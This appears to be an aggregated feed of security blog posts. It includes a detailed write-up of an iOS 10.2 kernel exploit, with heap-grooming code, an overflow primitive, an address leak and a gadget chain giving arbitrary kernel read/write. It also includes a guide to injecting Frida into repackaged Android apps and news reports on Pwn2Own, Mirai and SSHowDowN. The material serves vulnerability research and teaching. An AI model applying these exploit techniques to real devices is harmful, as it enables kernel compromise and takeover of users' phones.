A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.

There’s a bootstrapping problem here; we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access!  In December I published the mach_portal iOS kernel exploit which gives you kernel memory read/write and as part of that I wrote a handful of kernel introspections functions which allowed you to find process task structures and lookup mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.

The first version of this new exploit was developed inside the mach_portal xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.

Inside mach_portal I was able to find the address of an preallocated port buffer like this:

 // allocate an ipc_kmsg:
 kern_return_t err;
 mach_port_qos_t qos = {0};
 qos.prealloc = 1;
 qos.len = size;
 
 mach_port_name_t name = MACH_PORT_NULL;
 
 err = mach_port_allocate_full(mach_task_self(),
                               MACH_PORT_RIGHT_RECEIVE,
                               MACH_PORT_NULL,
                               &qos,
                               &name);

 uint64_t port = get_port(name);
 uint64_t prealloc_buf = rk64(port+0x88);
 printf("0x%016llx,\n", prealloc_buf);

get_port was part of the mach_portal exploit and is defined like this:

uint64_t get_port(mach_port_name_t port_name){
 return proc_port_name_to_port_ptr(our_proc, port_name);
}

uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {
 uint64_t ports = get_proc_ipc_table(proc);
 uint32_t port_index = port_name >> 8;
 uint64_t port = rk64(ports + (0x18*port_index)); //ie_object
 return port;
}

uint64_t get_proc_ipc_table(uint64_t proc) {
 uint64_t task_t = rk64(proc + struct_proc_task_offset);
 uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);
 uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);
 return is_table;
}

These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.

I used this method with some trial and error to determine the correct value to overwrite ikm_size to be able to align the controlled portion of an exception message with the start of the next heap object.

get-where-what
The final piece of the puzzle is the ability know where controlled data is; rather than write-what-where we want to get where what is.

One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.

One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks, the latest talk has details of the zone freelist randomization.

Whilst experimenting with the heap behaviour using the introspection techniques described above I noticed that some size classes would actually still give you close to linear allocation behavior (later allocations are contiguous.) It turns out this is due to the lower-level allocator which zalloc gets pages from; by exhausting a particular zone we can force zalloc to fetch new pages and if our allocation size is close to the page size we’ll just get that page back immediately.

This means we can use code like this:

 int prealloc_size = 0x900; // kalloc.4096
 
 for (int i = 0; i < 2000; i++){
   prealloc_port(prealloc_size);
 }
 
 // these will be contiguous now, convenient!
 mach_port_t holder = prealloc_port(prealloc_size);
 mach_port_t first_port = prealloc_port(prealloc_size);
 mach_port_t second_port = prealloc_port(prealloc_size);
 
to get a heap layout like this:

This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique but works perfectly well enough for a research tool.

We can now free the holder port; trigger the overflow which will reuse the slot where holder was and overflow into first_port then grab the slot again with another holder port:

 // free the holder:
 mach_port_destroy(mach_task_self(), holder);

 // reallocate the holder and overflow out of it
 uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};
 do_overflow(0x1000, 64, overflow_bytes);
 
 // grab the holder again
 holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first port to 0x1104.

After the ipc_kmsg structure has been filled in by ipc_get_kmsg_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:

void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,
                     ipc_kmsg_t       kmsg)
{
 ipc_kmsg_t first = queue->ikmq_base;
 ipc_kmsg_t last;

 if (first == IKM_NULL) {
   queue->ikmq_base = kmsg;
   kmsg->ikm_next = kmsg;
   kmsg->ikm_prev = kmsg;
 } else {
   last = first->ikm_prev;
   kmsg->ikm_next = first;
   kmsg->ikm_prev = last;
   first->ikm_prev = kmsg;
   last->ikm_next = kmsg;
 }
}

If the port has pending messages the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of messages sends and receives will allow us use this fact to read back the address of the second ipc_kmsg buffer:

 uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};
 send_prealloc_msg(first_port, valid_header, 8);
 
 // send a message to the second port
 // writing a pointer to itself in the prealloc buffer
 send_prealloc_msg(second_port, valid_header, 8);
 
 // receive on the first port, reading the header of the second:
 uint64_t* buf = receive_prealloc_msg(first_port);
 
 // this is the address of second port
 kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:

void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {
 struct thread_args* args = malloc(sizeof(struct thread_args));
 memset(args, 0, sizeof(struct thread_args));
 memcpy(args->buf, buf, n*8);
 
 args->exception_port = port;
 
 // start a new thread passing it the buffer and the exception port
 pthread_t t;
 pthread_create(&t, NULL, do_thread, (void*)args);
 
 // associate the pthread_t with the port
 // so that we can join the correct pthread
 // when we receive the exception message and it exits:
 kern_return_t err = mach_port_set_context(mach_task_self(),
                                           port,
                                           (mach_port_context_t)t);

 // wait until the message has actually been sent:
 while(!port_has_message(port)){;}
}

Remember that to get the controlled data into port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args which contains a copy of the controlled data we want in the message and the target port then it starts a new thread which will call do_thread:

void* do_thread(void* arg) {
 struct thread_args* args = (struct thread_args*)arg;
 uint64_t buf[32];
 memcpy(buf, args->buf, sizeof(buf));
 
 kern_return_t err;
 err = thread_set_exception_ports(mach_thread_self(),
                                  EXC_MASK_ALL,
                                  args->exception_port,
                                  EXCEPTION_STATE,
                                  ARM_THREAD_STATE64);
 free(args);
 
 load_regs_and_crash(buf);
 return NULL;
}

do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.

At this point the kernel’s interrupt handler will call exception_deliver which will look up the thread’s exception port and call the MIG mach_exception_raise_state method which will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field and use it to align the sent message to what it believes to be the end of the buffer:

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?

Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.

We observed before that if a port’s message queue is empty when a message is enqueued the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting it’s header with one what makes the ipc_kmsg still be valid and unused) then reading back the message sent to first port we can determine the address of the second port’s ipc_kmsg buffer.

read/write to arbitrary read/write
We’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.

For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.

Whoever developed that exploit had found that the IOKit Serializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.

In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.

Let’s free second_port and reallocate an IOKit userclient there:

 // send another message on first
 // writing a valid, safe header back over second
 send_prealloc_msg(first_port, valid_header, 8);
 
 // free second and get it reallocated as a userclient:
 mach_port_deallocate(mach_task_self(), second_port);
 mach_port_destroy(mach_task_self(), second_port);
 
 mach_port_t uc = alloc_userclient();
 
 // read back the start of the userclient buffer:
 buf = receive_prealloc_msg(first_port);

 // save a copy of the original object:
 memcpy(legit_object, buf, sizeof(legit_object));
 
 // this is the vtable for AGXCommandQueue
 uint64_t vtable = buf[0];

alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.

Note that we sent another message with a valid header to first_port which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable, using this we can determine the KASLR slide thus work out the address of OSSerializer::serialize.

Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference which will call ::release().

Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:

class OSSerializer : public OSObject
{
 OSDeclareDefaultStructors(OSSerializer)

 void * target;
 void * ref;
 OSSerializerCallback callback;

 virtual bool serialize(OSSerialize * serializer) const;
};

bool OSSerializer::serialize( OSSerialize * s ) const
{
 return( (*callback)(target, ref, s) );
}

It’s clearer what’s going on if we look as the disassembly of OSSerializer::serialize:

; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)

MOV  X8, X1
LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]
LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]
MOV  X0, X9
MOV  X2, X8
BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]

Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory we can replace it with the following fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments:

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.

Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary but they both take three arguments: source, destination and size and we can only completely control two.

However since we already have the ability to read and write this fake object from userspace we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments so what we need is a wrapper around one of those which passes a fixed size.

Looking through the cross-references to those functions we find uuid_copy:

; uuid_copy(uuid_t dst, const uuid_t src)
MOV  W2, #0x10 ; size
B    _memmove

This function is just simple wrapper around memmove which always passes a fixed size of 16-bytes. Let’s integrate that final primitive into the serializer gadget:

To make the read into a write we just swap the order of the arguments to copy from an arbitrary address into our fake userclient object then receive the exception message to read the read data.

You can download my exploit for iOS 10.2 on iPod 6G here: http://ift.tt/2oRV7NF

This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz, check out their code to see a different approach to exploiting this bug which also uses mach ports.

Critical code should be criticised
Every developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.

Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.

XNU is not alone in this, it’s a common story across many codebases. For example LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation and for extra irony the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.

from Project Zero http://ift.tt/2nZVJBt

Using Frida on Android without root

Frida is a great toolkit by @oleavr, used to build tools for dynamic instrumentation of apps in userspace.
It is often used, like Substrate, Xposed and similar frameworks, during security reviews of mobile applications by security professionals.

Typically such a review requires a rooted Android device. There are several reasons for this, but the two most important is that the frida-server binary, which executes on the device, requires root privileges to attach to (ptrace) the target application, in order to inject the Frida gadget library into the memory space of the process.

However, testing on a rooted device is not the only way! I am not sure why this technique is not more widely publicized, but Frida can also be used on non-rooted Android devices and non-jailbroken iPhones, without running frida-server at all. In this post I will focus on Android, however things are pretty similar on iOS – frida can also be used on jailed Apple devices.

A few advantages of using Frida on a non-rooted device:

  • Enables testing on devices you cannot or do not want to root (obviously).
  • Avoids some sideeffects due to application checks for ptracing/debugging or checks for tampered environment.

However:

  • This technique will trigger checks against repackaging, unless those are separately bypassed.

Adding frida-gadget to an Android application

The technique is simple, it can be described in short as “adding a shared library & repackaging the Android application”. Here it is, step by step:

  1. Get the the APK binary of te application you want to test, e.g. myapp.apk.
  2. Use apktool to decode the APK into it’s contents. Preferably its latest version.

    $ apktool d myapp.apk -o extractedFolder
    
  3. Add the frida native libraries (frida-gadget) into the APK’s /lib folder. The gadget libraries for each architecture can be found in Frida’s release page. Make sure to add the libraries for the correct architecture in a suitable folder under /lib, e.g. /lib/armeabi for 32bit ARM devices.

    $ apktool --version
    2.2.2
    
    $ apktool d -o out_dir original.apk
    I: Using Apktool 2.2.2 on original.apk
    I: Loading resource table...
    I: Decoding AndroidManifest.xml with resources...
    I: Loading resource table from file: ~/.local/share/apktool/framework/1.apk
    I: Regular manifest package...
    I: Decoding file-resources...
    I: Decoding values XMLs...
    I: Baksmaling classes.dex...
    I: Copying assets and libs...
    I: Copying unknown files...
    I: Copying original files...
    
    # download frida gadget - for 32bit ARM in this case
    $ wget http://ift.tt/2povVPv
    2017-04-11 10:48:45 (3.29 MB/s) - ‘frida-gadget-9.1.26-android-arm.so.xz’ saved [3680748/3680748]
    
    # extract the compressed archive
    $ unxz frida-gadget-9.1.26-android-arm.so.xz
    
    $ ls
    frida-gadget-9.1.26-android-arm.so
    
    # copy frida gadget library in armeabi directory under lib
    $ cp frida_libs/armeabi/frida-gadget-9.1.26-android-arm.so out_dir/lib/armeabi/libfrida-gadget.so
    
  4. Inject a System.loadLibrary("frida-gadget") call into the bytecode of the app, ideally before any other bytecode executes or any native code is loaded. A suitable place is typically the static initializer of the entry point classes of the app, e.g. the main application Activity, found via the manifest.

    An easy way to do this is to add the following smali code in a suitable function:

    const-string v0, "frida-gadget"
    invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V
    

    Alternatively someone could create a script that injects the library into the process via ptrace; but this script would need to be packaged with the application (just like gdbserver).

  5. Add the Internet permission to the manifest if it’s not there already, so that Frida gadget can open a socket.

    <uses-permission android:name="android.permission.INTERNET" />
    
  6. Repackage the application:

    $ apktool b -o repackaged.apk out_dir/
    I: Using Apktool 2.2.2
    I: Checking whether sources has changed...
    I: Smaling smali folder into classes.dex...
    I: Checking whether resources has changed...
    I: Building resources...
    I: Copying libs... (/lib)
    I: Building apk file...
    I: Copying unknown files/dir...
    
  7. Sign the updated APK using your own keys and zipalign.

    # if you dont have a keystore already, here's how to create one
    $ keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
    
    # sign the APK
    $ jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore mycustom.keystore -storepass mystorepass repackaged.apk mykeyaliasname
    
    # verify the signature you just created
    $ jarsigner -verify repackaged.apk
    
    # zipalign the APK
    $ zipalign 4 repackaged.apk repackaged-final.apk
    
  8. Install the updated APK to a device.

If this process seems complicated, the good news is that it can be automated. As part of the appmon hooking framework (based on Frida) @dpnishant released apk_builder, a script automating most of the above steps!

Using frida gadget

When you next start the application you are going to see an empty screen: The injected libfrida-gadget.so library has opened a tcp socket and waits for a connection from frida.

You should see a message similar to the following in logcat:

Frida: Listening on TCP port 27042

Running nestat on the device confirms the listening socket:

shell@flo:/ $ netstat -ln                                                  
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State     
tcp        0      0 127.0.0.1:27042         0.0.0.0:*               

As you might expect, the next step is connecting to the listening socket: Most frida tools work as expected although there are a few issues that can be handled better, e.g. connecting to the library after initialization, not just during loading.

There is just one thing to keep in mind: The process name you are going to use in Frida tooling should be “Gadget” instead of the normal package name.

$ frida-ps -U
Waiting for USB device to appear...
  PID  Name
-----  ------
16071  Gadget

Examples!

$ frida -U Gadget
     ____
    / _  |   Frida 9.1.26 - A world-class dynamic instrumentation framework
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at http://ift.tt/1hhG3wK
Waiting for USB device to appear...

[USB::Samsung SM-G925F::Gadget]-> Java.available
true
[USB::Samsung SM-G925F::Gadget]->
$ frida-trace -U -i open Gadget
Instrumenting functions...
open: Auto-generated handler at "/tmp/test/__handlers__/libc.so/open.js"
Started tracing 1 function. Press Ctrl+C to stop.                       
           /* TID 0x2df7 */
  4870 ms  open(pathname=0xa280b100, flags=0x241)
  4873 ms  open(pathname=0xb6d69df3, flags=0x2)
           /* TID 0x33d2 */
115198 ms  open(pathname=0xb6d69df3, flags=0x2)
115227 ms  open(pathname=0xb6d69df3, flags=0x2)

Enjoy!

from John Kozyrakis ~ blog http://ift.tt/2p7ycvw

Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own

The Tencent Keen Security Lab Team from China has won a total prize money of

$215,000

in the 2016

Mobile Pwn2Own

contest run by Trend Micro’s Zero Day Initiative (ZDI) in Tokyo, Japan.

Despite the implementation of high-security measures in current devices, the famous Chinese hackers crew has successfully hacked both Apple’s iPhone 6S as well as Google’s Nexus 6P phones.

Hacking iPhone 6S

For hacking Apple’s iPhone 6S, Keen Lab exploited two iOS vulnerabilities – a use-after-free bug in the renderer and a memory corruption flaw in the sandbox – and stole pictures from the device, for which the team was awarded

$52,500

.

The iPhone 6S exploit successfully worked despite the iOS 10 update rolled out by Apple this week.

Earlier this week, Marco Grassi from Keen Lab was credited by Apple for finding a serious remote code execution flaw in iOS that could compromise a victim’s phone by just viewing “a maliciously crafted JPEG” image.

However, a tweet from Keen Team

indicated

it was able to make the attack successfully work on iOS 10.1 as well.

The Keen Lab also managed to install a malicious app on the iPhone 6S, but the app did not survive a reboot due to a default configuration setting, which prevented persistence. Still, the ZDI awarded the hackers

$60,000

for the vulnerabilities they used in the hack.

Hacking Google’s Nexus 6P

For hacking the Nexus 6P, the Keen Lab Team used a combination of two vulnerabilities and other weaknesses in Android and managed to install a rogue application on the Google Nexus 6P phone without user interaction.

The ZDI

awarded

them a whopping

$102,500

for the Nexus 6P hack.

So, of the total potential payout of $375,000 from the Trend Micro’s Zero Day Initiative, the Keen Lab Team researchers took home $215,000.

from THN : The Hacker News http://ift.tt/2eTMESX

Chinese Electronics Firm to Recall its Smart Cameras recently used to Take Down Internet

You might be surprised to know that your security cameras, Internet-connected toasters and refrigerators may have inadvertently participated in the massive cyber attack that

broke a large portion of the Internet

on Friday.

That’s due to massive Distributed Denial of Service (DDoS) attacks against Dyn, a major domain name system (DNS) provider that many sites and services use as their upstream DNS provider for turning IP addresses into human-readable websites.

The result we all know:

Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, were among hundreds of sites and services that were rendered inaccessible to Millions of people worldwide for several hours.

Why and How Deadliest DDoS Attack Happened

It was reported that the Mirai bots were used in the massive DDoS attacks against DynDNS, but they “were separate and distinct” bots from those used to execute

record-breaking DDoS attack

against French Internet service and hosting provider OVH.

Here’s why:

Initially the source code of the Mirai malware was limited to a few number of hackers who were aware of the underground hacking forum where it was released.

But later, the link to the

Mirai source code

suddenly received a huge promotion from thousands of media websites after it got exclusively publicized by journalist Brian Krebs on his personal blog.

Due to the worldwide news release and promotion, copycat hackers and unprofessional hackers are now creating their own botnet networks by hacking millions of smart devices to launch DDoS attacks, as well as to make money by selling their botnets as DDoS-for-hire service.

Mirai malware is designed to scan for

Internet of Things

(IoT) devices – mostly routers, security cameras, DVRs or WebIP cameras, Linux servers, and devices running Busybox – that are still using their default passwords. It enslaves vast numbers of these devices into a botnet, which is then used to launch DDoS attacks.

Chinese Firm Admits Its Hacked DVRs and Cameras Were Behind Largest DDoS Attack

More such attacks are expected to happen and will not stop until IoT manufacturers take the security of these Internet-connected devices seriously.

One such IoT electronic manufacturer is Chinese firm Hangzhou Xiongmai Technology which admitted its products – DVRs and internet-connected cameras – inadvertently played a role in the Friday’s

massive cyber attack against DynDNS

.

The Mirai malware can easily be removed from infected devices by rebooting them, but the devices will end up infecting again in a matter of minutes if their owners and manufacturers do not take proper measures to protect them.

What’s worse?

Some of these devices, which include connected devices from Xiongmai, can not be protected because of hardcoded passwords, and the fact that their makers implemented them in a way that they cannot easily be updated.

“Mirai is a huge disaster for the Internet of Things,” the company confirmed to IDG News. “[We] have to admit that our products also suffered from hacker’s break-in and illegal use.”

The company claimed to have rolled out patches for security vulnerabilities, involving weak default passwords, which allowed the Mirai malware to infect its products and use them to launch massive DDoS attack against DynDNS.

However, Xiongmai products that are running older versions of the firmware are still vulnerable. To tackle this issue, the company has advised its customers to update their product’s firmware and change their default credentials.

The electronics components firm would also

recall

some of its earlier products, specifically webcam models, sold in the US and send customers a patch for products made before April last year, Xiongmai said in a statement on its official microblog.

Hackers are selling IoT-based Botnet capable of 1 Tbps DDoS Attack

Even worse is expected:

The Friday’s DDoS attack that knocked down half of the Internet in the U.S. is just the beginning because hackers have started selling access to a huge army of

hacked IoT devices

designed to launch attacks that are capable of severely disrupting any web service.

The seller claimed their botnet could generate 1 Terabit of traffic that’s almost equal to the

world’s largest DDoS attack

against OVH earlier this month, Forbes

reported

.

Anyone could buy 50,000 bots for $4,600, and 100,000 bots for $7,500, which can be combined to overwhelm targets with data.

Hacker groups have long sold access to botnets as a DDoS weapon for hire – like the infamous

Lizard Squad

‘s DDoS attack tool

Lizard Stresser

– but those botnets largely comprised of compromised vulnerable routers, and not IoT devices like connected cameras, toasters, fridges and kettles (which are now available in bulk).

In a separate disclosure, a hacking group calling itself New World Hackers has also

claimed

responsibility for the Friday’s DDoS attacks, though it is not confirmed yet.

New World Hackers is the same group that briefly knocked the BBC offline last year. The group

claimed

to be a hacktivist collective with members in China, Russia, and India.

Well, who is behind the Friday’s cyber attack is still unclear. The US Department of Homeland Security (DHS) and the FBI are investigating the DDoS attacks hit DynDNS, but none of the agencies yet speculated on who might be behind them.

The DynDNS DDoS attack has already shown the danger of

IoT-based botnets

, alarming both IoT manufacturers to start caring about implementing security on their products, and end users to start caring about the basic safety of their connected devices.

from THN : The Hacker News http://ift.tt/2eL4ibu

12-Year-Old SSH Bug Exposes More than 2 Million IoT Devices

Are your internet-connected devices spying on you? Perhaps.

We already know that the

Internet of Thing (IoT) devices

are so badly insecure that hackers are adding them to their botnet network for launching Distributed Denial of Service (DDoS) attacks against target services.

But, these connected devices are not just limited to conduct

DDoS attacks

; they have far more potential to harm you.

New research [

PDF

] published by the content delivery network provider Akamai Technologies shows how unknown threat actors are using a 12-year-old vulnerability in OpenSSH to secretly gain control of millions of connected devices.

The hackers then turn, what researchers call, these "

Internet of Unpatchable Things

" into proxies for malicious traffic to attack internet-based targets and ‘internet-facing’ services, along with the internal networks that host them.

Unlike recent attacks via

Mirai botnet

, the new targeted attack, dubbed

SSHowDowN Proxy

, specifically makes use of IoT devices such as:

  • Internet-connected Network Attached Storage (NAS) devices.
  • CCTV, NVR, DVR devices (video surveillance).
  • Satellite antenna equipment.
  • Networking devices like routers, hotspots, WiMax, cable and ADSL modems.
  • Other devices could be susceptible as well.

More importantly, the SSHowDowN Proxy attack exploits over a decade old default configuration flaw (

CVE-2004-1653

) in OpenSSH that was initially discovered in 2004 and patched in early 2005. The flaw enables TCP forwarding and port bounces when a proxy is in use.

However, after analyzing IP addresses from its Cloud Security Intelligence platform, Akamai estimates that over 2 Million IoT and networking devices have been compromised by SSHowDowN type attacks.

Due to lax credential security, hackers can compromise IoT devices and then use them to mount attacks

"against a multitude of Internet targets and Internet-facing services, like HTTP, SMTP and network scanning,"

and to mount attacks against internal networks that host these connected devices.

Once hackers access the web administration console of vulnerable devices, it is possible for them to compromise the device’s data and, in some cases, fully take over the affected machine.

While the flaw itself is not so critical, the company says the continual failure of vendors to secure IoT devices as well as implementing default and hard-coded credentials has made the door wide open for hackers to exploit them.

"We are entering a very interesting time when it comes to DDoS and other web attacks; ‘The Internet of Unpatchable Things’ so to speak," said Eric Kobrin, senior director of Akamai’s Threat Research team. 

"New devices are being shipped from the factory not only with this vulnerability exposed but also without any effective way to fix it. We’ve been hearing for years that it was theoretically possible for IoT devices to attack. That, unfortunately, has now become the reality."

According to the company, at least 11 of Akamai’s customers in industries such as financial services, retail, hospitality, and gaming have been targets of SSHowDowN Proxy attack.

The company is

"currently working with the most prevalent device vendors on a proposed plan of mitigation."

How to Mitigate Such Attacks?

So, if you own a connected coffee machine, thermostat or any IoT device, you can protect yourself by changing the factory default credentials of your device as soon as you activate it, as well as disabling SSH services on the device if it is not required.

More technical users can establish inbound firewall rules that prevent SSH access to and from external forces.

Meanwhile, vendors of internet-connected devices are recommended to:

  • Avoid shipping such products with undocumented accounts.
  • Force their customers to change the factory default credentials after device installation.
  • Restrict TCP forwarding.
  • Allow users to update the SSH configuration to mitigate such flaws.

Since IoT devices number has now reached in the tens of billions, it’s time to protect these devices before hackers cause a disastrous situation.

Non-profit organizations like MITRE has come forward to help protect IoT devices by challenging researchers to come up with new, non-traditional approaches for detecting rogue IoT devices on a network. The company is also offering up to

$50,000 prize money

.

from The Hacker News http://ift.tt/2e9YgVO